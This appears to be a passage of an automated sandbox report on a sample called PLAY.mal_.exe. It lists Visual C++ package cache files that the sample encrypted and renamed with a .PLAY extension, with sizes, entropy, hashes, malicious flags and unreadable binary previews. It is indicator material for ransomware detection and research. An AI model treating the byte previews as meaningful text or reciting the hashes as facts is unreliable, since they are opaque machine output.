        SHA-512:BD0E9B647B1268F7D587482EFFE68A7BC0A25EBCAF6C6ECDC3A6DC9A5D2B91FA0EADC787B1B2ED933BC7D21D11F7C5377992AEA7F7AEADC79F555D706C6ECB08
        Malicious:true
        Preview:.....uY.3..y..i).`|...)[...Pz[p9?gp.t....7...-95.K..$..u..|S.D...C.x;...#..T....[.b.f.:t...T...9....._...vX..xE)V^.c.....U\N..);..Nl;....-..S.....JCP.....k...{~t6.wX.r...X.."6..N."...........8....H#.....i.M..i.\...B..nF4..i].J-.{.r.{........v.N.({a..s,...q.#...S;..>{#.(..Id.;m.......'.{..{....%.V....I.]...../^.....l..vr...O......,<..v...>....^.`...p,-..H.s.....X.Da..c?R.u...y0K..W....p..oU.2c>..t9.f@^...s.m..Q.J"z!...y'N..s60x..0+.&x.'.x.T2.<.......262..!T...{....gdr..n.0...7.}St...\.p......P...j..L.2r...o..4..y..=O..{d.......:.;.Kd.j. .....p.C..y...d{..! :.........Y....n....jrpS...*.S......F.<]....-..n._..O.t..D......L*k.{.g...>.2..K......W..M..3....arn.g...B.6.5+Z...D.....z.B>.%%.g......k.q.>k.5..e.~3.$..9.c.? ..{b..cyH.Bud..e{N...*.-.... .."....5.Ae...0.<o......y.../~.....*..*j.g...........I.S.y)j....-......B1.c.. _..J.+J..t..v.8..Z.pM..q..IS._lU..R|...~.s...R.d.&i.L|......;_$.e.>...x.hB4'^.0...2.....B.o...!..=.R...)..5.T.....o.]TI...

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1896
        Entropy (8bit):7.888880841660045
        Encrypted:false
        SSDEEP:
        MD5:B096DBD7865CC7A779DA795826181521
        SHA1:AB0545E501519B13A6E45F1BDAEDB2B48F0527B2
        SHA-256:38C0FA3958DE71ACF24ACF39753EC4DEEED765C9872639045D12DF2BEDB284A8
        SHA-512:3B73A2C5320B8E9A07A98CA02FCE367ABCBD82D22378EF4E5F402E58171257552549026FAC3DB1341BA3FE9D3BD2D309189DC12F1DDEA6DDCAF86B1282B13C50
        Malicious:false
        Preview:.K.t.*..CX*...].*.B.......@.y.. G....pP.C.%0.q$....1.....b.."h..1#ve...3s.<.....(.@.......%q.V.......<....1..}/._5.>....W.M..H...\(...%..'4.7l.d.9eD. He.Gg...'...w.M......RfW".+....CB.H.*...ez..'..l7.u..;.Dn...%Z.....8=#..KA..E2.#;.%N..............y..}.9_.7R....kCj<....!!g.P..n...O...{$.uL.....=.Q..(...K.'.q..Q+8h...^.....|.^..y..}.nx.XV....]......X..w.....e.......a.0...._.o.`jR"..#.3....'l...$!.c.sj...&J..7.>.....2K...H.B\.o...V..]Y.9T....Y...F.K.3c..O~.a.t..<cYo.$............%F....vBF..;.BH..,S.......c..,3..5. .....i0+_..8..Yp....(.m7.s.d.L".s.'4../...GY|V3.F..\..3..7.VN'...]..].^...8.. ...7..N..!...co..c. ....q>.Ez.&&.8\..qm5..*...'"...I..G..Ow.W..[P,...=....:.x4.=../F&Z.]...Z...m....e....j.a.Rx.F.K...^..# /..Hh..#N..a!%..j..X...O....w.....9........E...<....Z...rj.OY...T..U.|.!.I>...........................NV.e..YP.a..X..B..a.."..\..*XO.diP......@.#.D'..}...H9Y8..v.m.9....ft.D...|.....r.2..v..9.n./.B..kLG.>..`....u.. ...^.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5801320
        Entropy (8bit):7.9984013871632325
        Encrypted:true
        SSDEEP:
        MD5:C2DAD1017BA52C0A6922BAD338B2ED97
        SHA1:718F72501713CD7E8B0157E1FC697258566AEF37
        SHA-256:D3623C96D298FC87FA617009467E365D71B66A9DF62046F2E5D5DAD0D6EC7AF8
        SHA-512:32F088BFDF2C8755A557675EEF5D79847620D3386C44150C91449C5159B929684C3E870B20CD3BC3C3F521592970A84C99BEE42A4BA669272CEA1376F91CA3A1
        Malicious:true
        Preview:@.W.@[...h.............EX...).&\..9~E.o%.4..7W.+{l..........w.J.X...|I.p...L.*..z....Y........M.Ug..2.S.a.......^./....W]..t.D..t..o..-:...sRI..ll.x.%1..V.......S.].Vxn.gb....m~.TH.s9..5.$b5......'.........L%.0..lH..Z,L&>.vv..O..e|qr....w.3?P@.t...^...MB...i.xO9..........r.R.f"_..W..l2.....4.[.|.s/......A...*.~...w...)..9..9...}F..W...n.*N..Q..X<.E)...r..s1..FD9.P...\.2...f.1+(j...I..J...=....?.S..yh.d.$.%F-=...........53o3=Tmk..iH2Gdk..=.J1j.....rq.*.......G...Q.\e....'..>.u.xB.av..P..._......w....xe...e......[...c...so...p\.$....S{.K...]/..~....\5>a..w.,..0.y|.3...Y.I.cl..Ky....w.-`..@i..I.3. ...j..~&4....}L..n(A...:.h.....S#BTp..0.K....X....<X.......Z28....b....6.l.p...0.....y.....7J....rJ.0..f.....W&..........*.C.......<EgV..Q..... .......x.k.b..\....u....&..x.z$......,.......!..h./..'............4i...M....@.g-,....e.1....!.=....{t.=.f.I..-I......a...^P..i.k..l.Q.....(.C]..9...E....Z.6@....^{Jd}H9............zYZ....+:..T......"..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\state.rsm.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2248
        Entropy (8bit):7.92239326399871
        Encrypted:false
        SSDEEP:
        MD5:2EFE7957C04780D2A4D2D4D91B76EF5A
        SHA1:BE032296047C32F5816C698CBD893062C85934FC
        SHA-256:5A7B6864E9F045B9CE4C2D270483B3F49D2F33BE2F4C3D167D528E7F0852E592
        SHA-512:398BEC5B61C630E7E49E6C95CDB01CFA6C65A6F64F7EB29EDC10304ABD6AB76EB2F4DA8ACC37DFD24B436577FB1767EA10BD873A36909805B6ACF01185549669
        Malicious:false
        Preview:G<.....a5|"....V._T.....9..xq...2..t..\..p$....../..-.x.d...xZ......+E....C..=.i.p...^...W....X..W8.P'...<.+........~...r].......+./........Ro..-B...Z.9.2...*.3."e....{.....$.....F...!.*c0.v.h....N.i.!{D...:Q...r.`.P..f..u..X].k.P.|.r..~.v2@...K....w..{.Q...|F....z..='.l.\.8..V...dp.0s.9.K...7L..Z...*...].x..Q...{G.|....=...:..F..K[..4.q.-..N.0@.(..Q>o8.R.;7V.X~..QU6..6...h.Y....vqv.......P......WAM....W........o...b[..}UnU.J.?!#Zl."......v.Uk1.5..$.<v.<NI.7i.H...{......j*D....?.%.]..;C._...[Hd......Y../..e.3...c.k5'.(.b...C'.H.......kE@.<.?..[.6...R......j....d>.......y..-.#k...m)....e.z..5..=q...mj..S.N{Jn.U'..WA?...|........n..0..........w|....hv...S..P.A.^.*.{..M.E.R.....S{..0..).<.vo}...........T.L.h...V...H...L..[f.<......I.~=./......"%..d.._.....@...7..:.8.....+.po.....u...[. ....d+cN|N0..S..@....R.Q5s$..I.....f.....t.[/;.G'c....v..n8..:Kd......v<.&....ks.....e.W.j.........X.QL.?.?....i./$.)..d.K..0.*.+~.....v.F<..\..^..G.2....

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5589352
        Entropy (8bit):7.998545828465086
        Encrypted:true
        SSDEEP:
        MD5:282500AB4DB2CF6CDA452D3312413E29
        SHA1:A15795EBC345D72425F094B54A2499CE0739F621
        SHA-256:532578D5F77CADC99AF60E8D7B55158E32FFD900888C8AA6CC690D5F77DFEFFC
        SHA-512:FD7F1E9A7BD6622043F894C8BB9801705925447DD9DA847F66DC153B59920E37A3DEAD9C9EF589EA1B51B3EC9734AD82BAC40F4A6285A231AA18AED41C2D6CF1
        Malicious:true
        Preview:.kZ....0@......Sg.cl...4..r@.c]fQ.e......?4.o.E.,..!...lx...P.m.%KC..Z.^.2..".(w..p.l7#..M...,9.~a...Z..[..xi..w..*.....Uy....Ul...c.r5.%6GE......u.2..0...Za...d.@.@.....V....o>...:.T.|J..5..~...c..#b....%.gnl.Q.d...9't=g..o4..k$>A.U..F......N..N..9....,...$E.Z..i...-[..I;..B..}m...|.@..._...:+J....c'..M.X..$.\'.....^..`t..r*....{..}....v.\.gh..^.O..t.h+..6L....7...{...1.v..^..rSU.s.d&D../.J@K...:.:?.F..R..uS.M..Q..R'....*.|&..|.]E8.;..7=E.-.....^R.M.Q..R.y.".s...|.D..tl*....D..6^..;t%...G.'8...G.'............#X..?.]2..F....e...5.%...6fFL..4.].....C..&.?d.JS."?.].d.Bu...p.....U.Q..H(.Y.%).z........i..:P..J6.e....O.}...t.4.Fj.....%.8Pr..y_./c.N...-/.B\nP..@.h...$I.`7.m{..H....C.8 $..Z...cI.jy..\...^.u...N.f...C....+....G..s.>[R......5...,5"...6.Q.}. u...Z...Q..?...`s...?..+O....@....Z'.3~n.m...Y..El.^..N......f.Ttt.5=<F....ls.`.\`..+...Q+...G.........SF&i..8C...Q.<..j.R.Q[.G.....B...........s...2.(...\%....bZ.._=.....2..Mf.l.....7......m.*a

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1035576
        Entropy (8bit):7.999825934794254
        Encrypted:true
        SSDEEP:
        MD5:F04DF6CF62D556BD6794FAF39305A895
        SHA1:FE7984E43633B09E435BC90393D503213EE5DEA8
        SHA-256:6B020E5DA5E519C2ED10FD1DDD087857E457BB8AE69E53EFA8FC234D38D98D27
        SHA-512:35DFA9BA04B761CB2E23D3AEED4A815AB303B86D409D9B791547BC5BE9F0AA0D4246B356FE03370DFA7F8D87A9B52531F55090F7B56B254A840E1113DA4ECFF9
        Malicious:true
        Preview:m.t..F8.i?.p..)g2.....' .e.jj~.}.z...}..,.A.{..t*1...M.Y..=5^y}.".zt3...&.f.,g[..?Jx...$......[......9~....:JM....n..?-...]....<^..6..&rI9.$..83Oy...q.x'b.v.~,.:yL.$...ZO........0B[.....x...3u.r...D..p..$.P.....:.o..~.)..rc.L.7o..G..$....O....b...6B...J).:s.._b.....c8....`/.~y.OS...3|.4/..:.0.6......p$.r.9.Mx..`....T......<.....5..;87......I.a..#;.....R7......{..8..f..5..z....Ln=..:/..{M...Q.V...5=:P6+dA..<..E.....<.Q.-E.....R..)........t....J..u9q..:h.....#Zdk....Z.c.....G..g..X3aV..B.._M)......tEu.h....n"..a.F.......7H..X.i.o.:Yr.Vlw"jY"..5..H.:x..EE K..f]Acu.0'.......'.H.+..9..C..c5..Gs...z...hWM.b.`...5.'..._..B....d.>B..[|.+d...\..A...O.Y...^gC../..Y?.Q....]..5.d7..........Zs6.o?.H.hg................vDal.Z...^.v...m....=....-#=.Y.G.....,. ..aLq{p..t..7.z..Z..T.......MAvy./..D...7..:.....-.....N[~.b.<..B.r+/.fN%..Y...g..d..^_s..>FN....4.W...pG..1.o....sq.._v)C..h.e.M..>(.......y.2....o.<.^N...5:....[.6Yri.^.I..|

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5154888
        Entropy (8bit):7.999960263280578
        Encrypted:true
        SSDEEP:
        MD5:5DE9BB4B9A1842360A5967727E6EB056
        SHA1:CD913C346D384F9B42487DEFF28338616351AFA9
        SHA-256:ADC6BBE62F96AD18D2F06BC85E61D76DC9C81A955C77FC165E34C78688868D68
        SHA-512:45CC961C42BB06EF6AA7506A658C275AA346E4746DE3B0D5A27FD294D9AE758AE26C81AB6D544B07D85F5FF4BEA51094860562E79CEC941D205254EC3AABC18D
        Malicious:true
        Preview:..i.(..&..UK.....%.3.pf..k....bf.... .q(.3<'..-..Zt....|.?....k..6,~.....R.../S...e0Sy3;.e.....y..c.>..*....[..=q0Y....j.....[....=.....X..x..d....F..]...n+....T...........C.G.(..`..y.Cd<6..L..P..x.^.D.Y.&.B.>y=f....,.0..1.@.h.UU.n..y..... ........eAA..<.j.....h.(s..s=.........]......BLT.P.n.M......,.c.Q[O._...o....W..|s.t.^....=.(.=*Of......E..SK....DGb.a.G.......k..y.Fs...!....E...r..j3v....]..L....+a`]..i.2N..4w.......[........>.l...E.y.."..nR.J..K.o..'..y0J...B....r......]gI.7...V........[.........;..%..*<.*.yo...n1.u...fk.1........!...~fy...4.L...f..nV.c.. ..WO.f..I.....D.]z...]....B..c1......./t.f.+f.J..'.Y.5@....U.7v2S!..e.=....b]..o..SX..!gG......E...F.B.5..9 .+;W.eOO.......~.r4.....*W.5.....}..<LU...`....bS.........[.dI&Q.g.<.F.6...D$'...g..@.....^...wEM...G.C...q...$/.;..s....j..U..M.kQh..1....].0....1.....A@~..C.+....T....F..B.....Y...:.m.....P.'.W..zP9...E.. bY....I.I.mU.......V:e..!L.-w...!Y..}.c*#.J.]h.-.......vh0..J..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):822760
        Entropy (8bit):7.9998186605183745
        Encrypted:true
        SSDEEP:
        MD5:31079187545A7A3EEAFD0B0F4610F4FB
        SHA1:16F4EE2A5164FDE356F3B4981E3BB6BC4BA726D7
        SHA-256:D9E556A775D5777E938AAFEF9CDFC4C8E7AF22D19E75F45BBD71C89B3AA3C0E7
        SHA-512:86DD17BDB6B1D1A5759346A924DA2F7FF6BB8E033A89B93AD1381BAE57B3AA40DE9786B13757282D94FB6787BEA6A5E0BD6AB36D4BF6B80BBB11C3F954B05607
        Malicious:true
        Preview:...B..@..5.&...M...t..._.f...k../..PB......V..F...2.!eN1...X.<F.......cV...........[*.#-.Fx....p5....H.9..V..../..ru...BRx...g]o].*m..9.....].hST.E.'.:...EU.<...I....k...'.=mt.?..K_..)4{.~!..:.XW.......U....)4...<.T.l./...+../..R$.:'.>..}1n.......,.!..2~P ........Rc...6|........r.gp....=.>.]...=....lZbfy;..,......at...,.9........*c.....F...}O.#^-..~...^.X.R+.5....=.../.*..f.'I.....h........R.?>.g..(.x..>q....:..[M....f..rZ.]...#:..1w?.QJ^...[..4.~.=4..m..37f..FO2E.M.......D....i.6..C....|..S.m...SA..h?X..u."....{.a.)...N..^....M..F.U.6y.....n.t.p..G3...6.muJMT|..T..v.F....?.4..N.w...7.&~...G.Vpt.K.......2...>.J.%.%...:...b...Q...|U.y..\ .}L..tO68.]...+..Ytr..=...a..*B?.....=.*:..qx.$....c...{...W...,.}.|.k....<..Zh.vE3.:...`..%/..l..JK.a..4 ...X.fw...&k....P.TSJ..7..*....s..7..Jx7PM.y,..D..D.n.@.&f...a4a...eyO'R.Z.-t.......G....Zh..3M...T.NT..L.*.?`..G...........3....O-.............B1.?........v.3.>B<2.V....Ne..h.rX..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2472
        Entropy (8bit):7.918397205752872
        Encrypted:false
        SSDEEP:
        MD5:52450C7D58698BC47EA5AD032D9487C0
        SHA1:BFD16D9F0C1AB91FA920072CE10EBB344740B63D
        SHA-256:98FCB9DBD48059CC38989EE3E9F4D3D45474B77BDBAB0DE77C4E50FD68DCA902
        SHA-512:70ECEBAC5020609F04B222B78FBC41C084C976BFC52C1E84AE37E70C361434F30EC45CF0236DF6AFC49BD257CE299509C23C4ACD7283312BC351F8A205EE22F0
        Malicious:false
        Preview:....i...'&v...........T.!S...).M.VM.o....\B.I.x..j....2.....e.b~.>G......O*~.I.............m.^.......v.:...KvA...X.5;X...^++.'z5.......r)'uT.n.....[.\.dGt']..0.z.Ay....H.......l..P......i9...=.^.(U.#...E...z*...:..nU.!....PX....V.Y....b..BV.`[.Y.T.R...L_.&...Q.P.B.g.\.R.u..jR.v^..5...U3n_.-.K.#yP.....Wp..9..W..W...*l.rY.....[Cm.<.\.Q.~..'...7:...4{...=.D............I.......S...~.c..+.Z".......U.\..v.........6.."......D.B..#$..........g.. ...{..x*M....X.4.e...)E&.|\..wD./.G,.y"x..:..ge...5[..J.l.i.j.......^.*j{.Jg.,....Cu....>G.t..P6SY....egl.)g7..\.j...9.@........O..M..A.. .....y.#b.)...C..h.....X.......}.6...\.N..V.........~P...c..,W%.*.@_6..He...W.I......(@..;.C..d..>nW}..l6...d...y.....-~.J....W?.,.W..=..d].z\i...a...XAO.U.........Ox~p,fX....R.{....(-.o]O2...v.*#..s.....2.9kx............x.K.4..-.. ...^..S...+..1v.iy7%_..<<..J!.m6Sl.]e..Fh6............@..n.......}.7.8I....6(.z.1..D..-.+...?.8..*RMp.......G....H.@.G.C..K..(..Y%v....B>..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1547736
        Entropy (8bit):7.999882127843735
        Encrypted:true
        SSDEEP:
        MD5:AC7BA4508E688E76B331547B98C385AF
        SHA1:B40CF4EBBBAD9D1E3FC950A387AEA612F666989A
        SHA-256:35983FBD0BC965E374D6BD1F147B5521DADD7B962E2A7FC16703EE871B5791F1
        SHA-512:235D6B1E0A7CAB5D7C34DE15952ABB285D592A1D3CA7910D81E7CD38DEED3B4524AAF89CBE357B61CFAE9BC69B7D7140D04E687B9BA37C460D90CBCA31433B29
        Malicious:true
        Preview:C..j.d.....j{.9...s.Z.:A...%._k....=.....(:3u.....R.^s..I-...gp...}y<x(..).....,q>.A. ....A..pju6....#.....].uG%.x.K7..my.B...qer..U............"...=U..H....S..H.;..J _-2^I.`....R.V#.f.s.R..K.......?..dZ.h..,.N...o....cV....M.T.2.".;....Lm...l<.V.N....Y...G.;....Lp..R...M.y.w..L..<v...`.#.........J...%...|..r....-...P..Q.$.hR..BY.\..)[.~..g`K.s...4 ....K<..c...H..<.,.....&M.PF..RW..?/...Q.}...WW..P.7..?.|2..y..I[...w....N..%....$..7..`m..Q.$|]......|g'E,6...U.....y..........y`.V.......^...V..l~Qe.2#a...)'.e(@..(r0.Idj:.lB(ZnB......VrC>....XI..8...n.pa8.O...lS.+......GNH'..X..thT..gsH..<......n...H...-5.... .s"._.....$....C.d..7..s.5.{J.....&P..M.z2.&%.)/+...M.3...c.6....Ds.k.mfF.a..[r.P..WEd\..x9.D5,..A.H.G...b......7R..U|.J}....3.;l.K9..0M../.E....<..d.@..I....TJ....Q.E..^!T.]....Ku.U.zc...7.|..c.NF?./.O..-....E..Ja.Ne..x..!..D....8...f:.....8g..cjm.wZ...f.u..vs...X..S..d.x.\.u...........o..E'f"..Ip...t..u..6".u.D.x5..%Q3..Y.l..WQB.O

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):4933976
        Entropy (8bit):7.999965056944057
        Encrypted:true
        SSDEEP:
        MD5:4F349E86E466361963F7CEC319570262
        SHA1:EA5EE8C64DC7D35D6EA92E03C4C7A9E8CFD6C234
        SHA-256:9BDCECFCB0613BDB324093C70C4E6234AD02B7E5A4735C4B3332F44F332BE65F
        SHA-512:ECD7E66C9A15419F6B3B3F6B03EA0F5276EDE7B8C368216BD6F4303E20D8C621421C68A4DD2CB6EF1BB168934A0CAA7C41FAE0C970406A6A28335901CAEF1683
        Malicious:true
        Preview:...;.c.......[.8.z/.g....?...S.#..T.X..0/.Xt.L.Q....!..^...k.3.-...r..K(Ak..A..<'....L..!...#4.qs.C...`N.!R}....O$8..j.m..R>RO..w....).P........<.g.D.k)...\:..9\.........o~J....M..?(.#;.4T.u.yX^.....K...JA<../....]..L.[...!...9.F...R(.:...n....KY.........k..h...AG.`[..#).5.IH..Z.1.L^k.P......d...l.y.T.."G..4....l.....'.z.....*...-Lx.5.p;.w.......o.WS,.\XS.. ...."%z[g..p.7.u....J..._......'....0./....Jl...^....T..6d.l.*.c....3...x\.... ..L@)d........A. Nb..v.....x.q..$..=.....a ..@..K*.}(.p.#...>.........c.&.'..o..X...4..LPjp9F.7*\....?g/....).O.....^l...T...mZ.R...%[....-Y........N....uJ..1R.}o......\.$#....(. 7w.S.{T/dp..K.nrU.y[......a...%.Y.6ue.^...j..@._"x....4_...S...ca.yq...\y.L..t......-.o....S.G...2~.V%..Wm..4..[T...E*.;..3.C.df...;#..%.uN.i..P....?...&.....xE..73c.vT........-;7i..q..V.......QE_....H...&..#..<6...V...d2v.Jf...jK..gd.!~r...G....l....-...i._I......a..b:...hF.J8..09./..H.fa.dN@8...B8.6..$1.&.....wR<..../..v.Hqo..-=.U.Y..Q..d.

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1896
        Entropy (8bit):7.887847781943311
        Encrypted:false
        SSDEEP:
        MD5:146428A951777E2AD38D58B126B52129
        SHA1:04BF78E77E40CF4709F1B7B9AF7031B2406829B2
        SHA-256:CC42FB00680E70EF3A04F9EAF1071E512F165BC24B023C012CBC692DEF470857
        SHA-512:309646B8A8B251EFD2FD159C24D24CAA09715CA938D0E4DC29394592874FD89350FD6897B14393D3E424A61AC9DE0D19F24598CF6CE53F1644679D76C12775C7
        Malicious:false
        Preview:.k9#.v}...`.Y...dd?.X.Mmt.y^q._.4.T....@.&.<.=L+.!...l;....T..kA^,..!.UO..V.7..A..5Q..&Gc.J$>...#...Ua.0.IF..P.,..*..._|..6.Ao.ZJ.oWg...ZQ($sI...mcm........&c/S55.q...........<...n..l[IY.2.H.`s9.gb.#UUJ.!..o.ZM..g#)....g.....~~$$..D^.]-.W..7.7.w%....4.]K...l.M|J;.a/..f..@..8...5..4......e.C0.r..E.v.*.k...?....bL@.a..\.....;...^.6.....I.='>N<...G..r....Bc.)D.i9ZK9'*3.....g.H....^...no...y.nk7?....0>..Zr.z...;.......=.s.M@.De.k9..j...u.."...7....h.....e..T..S...P......IL.L.....s.*...~.@.D..L._..B......o..*....h....0:t.wK.i*.l.? ^Ckk.dT..wuR.....CC.@...q..../.....D..9.f.C...L.2....~.0h.....V...}[.f...m.........k_.q.8r..-.T....d._...?SU.....\j.?.B8_.....lQ.....5...r^2.....(tYf..q.}...a..fC.%o....cz6.3..%..d..Pz#h'.?.*.>!.r..0.5-...i...."k.|..1..5:..(...7..!1(.f.Q..5G.k.!'..G.........8e.........T..U.|.!.I>............................>..G..u.....7.Ak...8.........".Z.V~....I..d...c.....n7...F......NeN.u.Csr........UNw........)....n"E.$."t.p........L>..

        C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm.PLAY (copy)

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2248
        Entropy (8bit):7.900285384342696
        Encrypted:false
        SSDEEP:
        MD5:76B5B76651EB293CEFCC82B457D7EB46
        SHA1:DFC3EE286A4104F601DAFDD722F96445D649E5BF
        SHA-256:8E24B6FC4C0804B2FD300047C43E1BCFFE1008C8A045B1FE4536083B73C297CF
        SHA-512:90027E6BD35BD260D293E67242AF9756EEA6BA84209C2D91140CEA4053C45B03B3FB46289664EE3A433AD47821729459F342D2BCA921782EA89C1BCAC2E9418F
        Malicious:false
        Preview:..t.8.,=.+...kSC.2.l.<SMl..QP..f....../..?...b.....).#!O...Y...M..|.&...r.....0....+-..s..../.D.J..%&.`...c......f......W}&..:.A..V........(.UP.R...Z([w.Ne.,|^.#...@..J.Z..C!|!@7..T....;".eB.i..-ht.,0.M_6u._W..pBW.05....2.Y>..B..z..j.....8..K{.O.V ......E.U...7..$.'....$!ZU.......<9......Tq,L."{..qp.'.s..~.......d...S-....r..xt...4Z7w.....=...J....[..44..[....@r....W.I..N....`...`.O.d.D.o....tc*...P....%...m...gV..;..,y.3.."....WbC.......86..R......V...p\w...yI...fF..??/.....E..Q.........u..N.}r..It..H.H..R\.`.[.....x..`.YK...b..H.d..q..Do....W;t....T).3..B([...%......".*..%x.s.I..a...'.;@".....j..Iyx...........N.vr.....tiq.r..Hf......q;.+..C..E.I...\.Bn.6.vO5w..$.aB.....&.v.&.9a..iz.V....y.(v.{.|...Rn}..V......T.RP.].<...AH...c..|M&...M.....}...PI.f.J...=}U...=.*&X.r.#..t.)....[.8E.1.y.@.j..u"(.....*..l8~.JM...9....J...C~.HK..o-z.j~...6.;..q.@..].L......@..6..Y2J.^..@>.....B...z...,..iD_q.s......0...yv1..>}.7.....,..

